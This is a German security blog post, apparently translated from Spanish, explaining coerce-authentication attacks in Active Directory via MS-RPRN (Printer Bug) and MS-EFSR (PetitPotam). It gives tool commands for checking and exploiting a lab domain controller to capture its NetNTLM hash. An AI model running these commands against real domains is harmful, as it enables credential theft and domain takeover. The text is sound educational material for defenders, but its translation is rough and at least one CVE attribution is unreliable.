Coerce | Parte 1

Zwingen | Teil 1

Celia Catalán


Innerhalb der Active Directory-Umgebung nutzen Angreifer erzwungene Authentifizierung und MitM-Strategien, um verschiedene Aktionen auszuführen. Aus diesem Grund befassen wir uns bei dieser Gelegenheit mit dem Thema „Coerce Authentication“. In verschiedenen Beiträgen erklären wir die verschiedenen Möglichkeiten, diese Technik durchzuführen und wie man sie mit anderen Angriffen verknüpft, um die Privilegien in einer Domäne zu erhöhen.

„Authentifizierung erzwingen“ ist eine Technik, die durch Aufrufe von Windows Remote Procedure Calls (RPC) einen Dienst zur Authentifizierung gegenüber einem Computer zwingt. Mit dieser Technik kann ein Angreifer einen anfälligen Server dazu zwingen, sich bei einer vom Angreifer kontrollierten Maschine zu authentifizieren und so den Hash des Maschinenkontokennworts im NetNTLM-Format zu erhalten.

Ein Maschinenkonto in Windows-Netzwerken bezieht sich auf eine eindeutige Identität, die einem Gerät im Netzwerk zugeordnet ist. Maschinenkonten sind für den Aufbau der Kommunikation und Zusammenarbeit zwischen Geräten innerhalb einer Netzwerkumgebung mit Windows-Betriebssystemen unerlässlich.

Sobald der Hash eines Maschinenkontos ermittelt wurde, eröffnen sich eine Reihe möglicher Techniken, um diese Authentifizierung auszunutzen und sich als Opfer auszugeben. Ein Teil der Kritikalität dieser Technik liegt darin, dass eine Maschine das Opfer ist. Wenn diese Technik beispielsweise gegen einen Domänencontroller eingesetzt wird, ist es möglich, die gesamte Domäne zu kompromittieren, wodurch die Kritikalität dieser Technik erhöht wird.

Was ist RPC?

RPC steht für Remote Procedure Call und ist eine Form der Interprozesskommunikation (IPC). Diese Technologie ermöglicht es Anwendungen, sich gegenseitig Signale zu senden, um einen Vorgang auszuführen.

In Windows-Umgebungen wird RPC häufig für viele verschiedene Dienste verwendet, z. B. zum Planen von Aufgaben, zum Erstellen von Diensten, zum Konfigurieren von Druckern, zum Konfigurieren gemeinsam genutzter Ressourcen und zum Verwalten verschlüsselter, remote gespeicherter Daten. …

Aufgrund der Natur von RPC als Remote-Vektor erregt es aus Sicht der Computersicherheit große Aufmerksamkeit.

Hauptgefährdete RPCs 

Als nächstes listen wir die wichtigsten bekannten anfälligen RPCs für die Verwendung der „Coerce Authentication“-Technik auf.

Es ist zu beachten, dass zum Ausnutzen dieser RPCs ein gültiges Domänenbenutzerkonto erforderlich ist. Im Fall des als MS-EFSR bekannten RPC ist es jedoch möglich, ihn ohne Benutzer auszuführen.

Für diesen zweiten Fall, bei dem die Ausnutzung anonym erfolgte, hat Microsoft dies als Sicherheitslücke betrachtet und Sicherheitspatches zur Behebung veröffentlicht.

MS-RPRN

MS-RPRN ist der Remote Procedure Call, der sich auf das Remote-Drucksystemprotokoll bezieht.

Print Spooler von Microsoft ist ein Dienst, der Druckaufträge und andere druckbezogene Aufgaben verwaltet. Ein Angreifer, der einen Domänenbenutzer/Computer kontrolliert, kann mit einem bestimmten RPC-Aufruf den Spooler-Dienst eines Ziels aktivieren, auf dem er ausgeführt wird, und ihn dazu veranlassen, sich bei einem vom Angreifer ausgewählten Ziel zu authentifizieren. Dieses Verhalten wird von Microsoft als „Wird nicht behoben“ markiert und ist standardmäßig in allen Windows-Umgebungen aktiviert.

Überprüfung

Um zu überprüfen, ob RPC auf dem Computer des Opfers aktiviert ist, können Sie das rpcdump- Tool von impacket verwenden:

Befehl: python3 rpcdump.py @dc.corp.lab | grep 'MS-RPRN'

  

Ilustración 1 – MS-RPRN habilitado.

Es ist zu beachten, dass es weitere Methoden gibt, mit anderen Tools und Techniken zu überprüfen, ob der RPC aktiviert ist.

Ausbeutung


Nachdem überprüft wurde, dass der RPC namens „MS-RPRN“ im Opfer aktiviert ist, wird er nicht nur auf andere Weise einen Domänenbenutzer kompromittiert, sondern auch über einen PoC namens Printer Bug oder SpoolSample ausgenutzt, der ihm zugewiesen ist. Die Kennung CVE -2021-34527. 

Um zu überprüfen, ob die Authentifizierung korrekt erzwungen wird, verwenden wir ebenfalls den Benutzer „bob“ mit eingeschränkten Berechtigungen in der Domäne „dc.corp.lab“.

Befehl: python3 Printerbug.py „CORP/bob: @dc.corp.lab“ attack_machine

Ilustración 2 – Explotación satisfactoria de printerbug.



Nachdem die Sicherheitslücke ausgenutzt wurde, wurde der netNTLMv2-Hash des Domänencontroller-Maschinenkontos abgerufen. 

Ilustración 3 – Obtención hash NetNTLM.


MS-EFSR


MS-EFSR ist der Remote Procedure Call im Zusammenhang mit dem Remote File Encryption System-Protokoll. Es führt Wartungs- und Verwaltungsvorgänge für verschlüsselte Daten durch, die remote gespeichert und über ein Netzwerk abgerufen werden und als RPC-Schnittstelle verfügbar sind.
Es ist zu beachten, dass dieser RPC ursprünglich anonym ausgenutzt werden konnte, ohne dass zuvor ein Domänenbenutzerkonto kompromittiert werden musste. Aus diesem Grund hat Microsoft sowohl am 10. August 2021 als auch am 10. Mai 2022 zwei Sicherheitspatches veröffentlicht, die dafür verantwortlich sind, die Möglichkeit zu beheben, diese Technik ohne Domänenbenutzer ausführen zu können.

Überprüfung


In diesem Fall verwenden wir das Crackmapexec- Tool, derzeit bekannt als netexec , durch die Ausführung des Moduls „petitpotam“, um anonym zu überprüfen, ob der Server angreifbar ist oder nicht:

Befehl: crackmapexec smb dc.corp.lab -M petitpotam

Ilustración 4 – Domain Controler vulnerable.

Es ist zu beachten, dass es weitere Methoden gibt, mit anderen Tools und Techniken zu überprüfen, ob der RPC aktiviert ist.

Ausbeutung


Nachdem überprüft wurde, dass der Domänencontroller anonym angreifbar ist, wird er über einen PoC namens Petit Potam ausgenutzt, dem zwei Kennungen CVE-2021-36942 und CVE-2022-26925 zugewiesen werden.

Um zu überprüfen, ob die Authentifizierung anonym erzwungen wird, führen wir den PoC aus und lassen die Parameter Benutzer (-u), Passwort (-p) und Domäne (-d) leer.

Befehl: python3 PetitPotam.py -u „“ -p „“ -d „“ attack_machine dc.corp.lab

Ilustración 5 – Explotación satisfactoria de PetitPotam.

Sie können die Erfassung des NetNTLM-Hashs im Reply-Tool sehen.

Ilustración 7 – Obtención hash NetNTLM.


In zukünftigen Folgen werden wir bis zum nächsten Mal weiterhin über andere gefährdete CPR sprechen! Agur!

Dimas Pastor , Senior Analyst bei Grupo Zerolynx .
Zurück zum Blog

Hinterlasse einen Kommentar

Bitte beachten Sie, dass Kommentare vor der Veröffentlichung genehmigt werden müssen.